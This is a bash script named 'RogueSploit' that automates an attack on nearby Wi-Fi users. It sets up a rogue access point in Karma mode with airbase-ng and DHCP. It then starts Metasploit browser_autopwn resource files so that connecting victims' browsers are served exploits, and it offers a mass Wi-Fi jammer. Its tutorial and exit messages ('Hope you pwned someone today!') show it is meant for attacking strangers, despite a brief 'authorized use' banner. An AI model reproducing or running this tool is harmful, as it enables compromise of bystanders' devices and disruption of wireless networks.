#!/bin/bash
##############################################################################################################
#                                     FAKE AP AUTOPWN w/ KARMA                                               #
#                                        by _B4ckp0r7                                                        #
#This is a simple script for creating a fake access point with                                               #
#dhcpd configuration, dns redirections, sniffing and browser_autopwn1 and 2 too                              #
##############################################################################################################

#colors
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'



#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 33 84 > /dev/null
echo -e $white" [!] RUNNING SERVICES [!]"
service postgresql start
msfdb init
msfdb start
msfd
pkill dhcpd
pkill airbase-ng
airmon-ng stop wlan1mon
ifconfig at0 down
sleep 3
echo -ne $red"Press any key to continue... "
read starting
clear



###################################################
# CTRL C
###################################################
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"--<[!] (Ctrl + C ) Detected, Trying To Exit... [!]>--"
sleep 1
echo ""
pkill dhcpd
pkill airmon-ng
pkill airbase-ng
airmon-ng stop wlan1mon
ifconfig at0 down
echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
sleep 1
echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
echo -e $yellow"--<[*] Thank You For Using RogueSploit B) [*]>--"
exit
}



#WARNING !!!
clear
echo -e $red" Loading the world..."
sleep 2
echo -e $red""
echo " =================================================================="
echo "|     PLEASE USE ONLY FOR LEGAL | AUTHORIZED | STUDY PURPOSES      |"
echo " =================================================================="
echo ""
echo -n "Press any key to continue .............."
read warning

#starting the pwning

autopwning1 () {
	ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
	touch /var/lib/dhcp/dhcpd.leases
	dhcpd -cf dhcpd.conf at0
	msfconsole -r $(pwd)/roguepwn1.rc
}
autopwning2 () {
	ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
	touch /var/lib/dhcp/dhcpd.leases
	dhcpd -cf dhcpd.conf at0
	msfconsole -r $(pwd)/roguepwn2.rc
}

#menu1
menu () {
clear
echo -e $yellow"--<"$blue"[*]"$yellow" Roguesploit -- by _B4ckp0r7 "$blue"[*]"$yellow">--"
echo -e $lightgreen"--<[?] What do you want to do? [?]>-- ";
echo -e $lightgreen"       1. Start RogueAP"
echo -e $lightgreen"       2. Start Pwning Services"
echo -e $lightgreen"       3. Start WiFi Massive Jammer"
echo -e $lightgreen"       4. Credits"
echo -e $lightgreen"       5. Exit"
echo -e $lightgreen"       6. TUTORIAL"
echo -ne $yellow"root@roguesploit:"; read answer1

if test $answer1 == '1'
	then
	echo -e $yellow"Starting RogueAP"
	pkill airbase-ng
	pkill airmon-ng
	pkill dhcpd
	echo -ne $green"Choose a name for your AP:" ;tput sgr0
	read nameap
	sleep 1
	echo -e $red"[!] YOU NEED WLAN1 INTERFACE FOR THESE [!]"
	sleep 1
	echo -e $yellow"Starting RogueAP on wlan1 with name $nameap"
	sleep 2
	sudo airbase-ng -P -C 30 -e "$nameap" -v wlan1
	menu
elif test $answer1 == '2'
	then
	clear
	echo -e $green"Which AutoPwn do you want? "
	echo -e $yellow" 1. Browser Autopwn 1 "
	echo -e $blue" 2. Browser Autopwn 2 "
	echo -ne $red"root@pwningservices: ";tput sgr0
	read autopwnans
	if test $autopwnans == '1'
		then
		autopwning1
		clear
		menu
	elif test $autopwnans == '2'
		then
		autopwning2
		clear
		menu
	else 
		echo -e $red"[!]  Incorrect Number  [!]"
		echo -n -e $yellow"  Do you want exit? ( Yes / No ) :"
		read back
		if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
			then
			echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
			pkill dhcpd
			pkill airmon-ng
			pkill airbase-ng
			ifconfig at0 down
			sleep 1
			echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
			echo -e $yellow"--<[*] Thank You For Using RogueSploit B) [*]>--"
			sleep 2
			clear
			exit
		elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
			then
			menu
		fi
	fi
elif test $answer1 == '3'
	then
	python wifijammer.py
	menu	
elif test $answer1 == '4'
	then
	echo -e "Made by B4ckP0r7 with love, Italian Engeering"
	echo -e $blue"   Big thanks to:"
	echo -e $red"--<[ My friends ]>--"
	echo -e $green"--<[ GNU / Linux ]>--"
	echo -e $yellow"--<[ Hackers Elite Group ]>--"
	echo -e $white"--<[ And averyone who ever supported me ]>--"
	echo -e $blue" Press any key to continue... "
	read continuee
elif test $answer1 == '5'
	then
	clear
	pkill dnsmasq
	pkill dhcpd
	pkill airmon-ng
	pkill airbase-ng
	ifconfig at0 down
	echo -e $red"Goodbye.."
	sleep 2
	clear
	exit
elif test $answer1 == '6'
	then
	echo -e $white" TUTORIAL FOR ROGUESPLOIT"
	echo -e $yellow" 1) OPEN 2 DIFFERENT TERMINALS;"
	echo -e $yellow" 2) START THE SCRIPT AND SELECT ROGUE AP (Option 1) ON FIRST TERMINAL;"
	echo -e $yellow" 3) IN THE SECOND TERMINAL SELECT PWNING SERVICES (Option 2)"
	echo -e $yellow" 4) THEN JUST WAIT FOR SOMEONE CONNECTING TO YOURE AP AND THEY WILL BE REDIRECTED TO YOUR LOCAL BROWSER_AUTOWPN SERVER!"
	echo -e $yellow" 5) ENJOY!"
	echo -ne $yellow"Press any key to continue..."
	read continuos
	menu
else
		echo -e $red"[!]  Incorrect Number  [!]"
		echo -n -e $yellow"  Do you want exit? ( Yes / No ) :"
		read back
		if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
			then
			echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
			pkill dhcpd
			pkill airmon-ng
			pkill airbase-ng
			ifconfig at0 down
			sleep 1
			echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
			echo -e $yellow"--<[*] Thank You For Using Karmasploit B) [*]>--"
			sleep 2
			clear
			exit
		elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
			then
			menu
		fi
fi
}
#menu2
clear
echo -e $yellow"--<"$blue"[*]"$yellow" Roguesploit -- by _B4ckp0r7 "$blue"[*]"$yellow">--"
echo -e $lightgreen"--<[?] What do you want to do? [?]>-- ";
echo -e $lightgreen"       1. Start RogueAP"
echo -e $lightgreen"       2. Start Pwning Services"
echo -e $lightgreen"       3. Start WiFi Massive Jammer"
echo -e $lightgreen"       4. Credits"
echo -e $lightgreen"       5. Exit"
echo -e $lightgreen"       6. TUTORIAL"
echo -ne $yellow"root@roguesploit: "; read answer1

if test $answer1 == '1'
	then
	pkill airbase-ng
	pkill airmon-ng
	pkill dhcpd
	echo -e $yellow"Starting RogueAP"
	echo -ne $green"Choose a name for your AP:" ;tput sgr0
	read nameap
	sleep 1
	echo -e $red"[!] YOU NEED WLAN1 INTERFACE FOR THESE [!]"
	sleep 3
	echo -e $yellow"Starting RogueAP on wlan1 with name $nameap"
	sleep 2
	sudo airbase-ng -P -C 30 -e "$nameap" -v wlan1
	menu
elif test $answer1 == '2'
	then
	clear
	echo -e $green"Which AutoPwn do you want? "
	echo -e $yellow" 1. Browser Autopwn 1 "
	echo -e $blue" 2. Browser Autopwn 2 "
	echo -ne $red"root@pwningservices: ";tput sgr0
	read autopwnans
	if test $autopwnans == '1'
		then
		autopwning1
		clear
		menu
	elif test $autopwnans == '2'
		then
		autopwning2
		clear
		menu
	else 
		echo -e $red"[!]  Incorrect Number  [!]"
		echo -n -e $yellow"  Do you want exit? ( Yes / No ) :"
		read back
		if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
			then
			echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
			pkill dhcpd
			pkill airmon-ng
			pkill airbase-ng
			ifconfig at0 down
			sleep 1
			echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
			echo -e $yellow"--<[*] Thank You For Using RogueSploit B) [*]>--"
			sleep 2
			clear
			exit
		elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
			then
			menu
		fi
	fi
elif test $answer1 == '3'
	then
	python wifijammer.py
	menu	
elif test $answer1 == '4'
	then
	echo -e "Made by B4ckP0r7 with love, Italian Engeering"
	echo -e $blue"   Big thanks to:"
	echo -e $red"--<[ My friends ]>--"
	echo -e $green"--<[ GNU / Linux ]>--"
	echo -e $yellow"--<[ Hackers Elite Group ]>--"
	echo -e $white"--<[ And averyone who ever supported me ]>--"
	echo -e $blue" Press any key to continue... "
	read continuee
	menu
elif test $answer1 == '5'
	then
	clear
	pkill dnsmasq
	pkill dhcpd
	pkill airmon-ng
	pkill airbase-ng
	ifconfig at0 down
	echo -e $red"Goodbye.."
	sleep 2
	clear
	exit
elif test $answer1 == '6'
	then
	echo -e $white" TUTORIAL FOR ROGUESPLOIT"
	echo -e $yellow" 1) OPEN 2 DIFFERENT TERMINALS;"
	echo -e $yellow" 2) START THE SCRIPT AND SELECT ROGUE AP (Option 1) ON FIRST TERMINAL;"
	echo -e $yellow" 3) IN THE SECOND TERMINAL SELECT PWNING SERVICES (Option 2)"
	echo -e $yellow" 4) THEN JUST WAIT FOR SOMEONE CONNECTING TO YOURE AP AND THEY WILL BE REDIRECTED TO YOUR LOCAL BROWSER_AUTOWPN SERVER!"
	echo -e $yellow" 5) ENJOY!"
	echo -ne $yellow"Press any key to continue..."
	read continuos
	menu
else
		echo -e $red"[!]  Incorrect Number  [!]"
		echo -n -e $yellow"  Do you want exit? ( Yes / No ) :"
		read back
		if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
			then
			echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
			pkill dhcpd
			pkill airmon-ng
			pkill airbase-ng
			ifconfig at0 down
			sleep 1
			echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
			echo -e $yellow"--<[*] Thank You For Using Roguesploit B) [*]>--"
			sleep 2
			clear
			exit
		elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
			then
			menu
		fi
fi
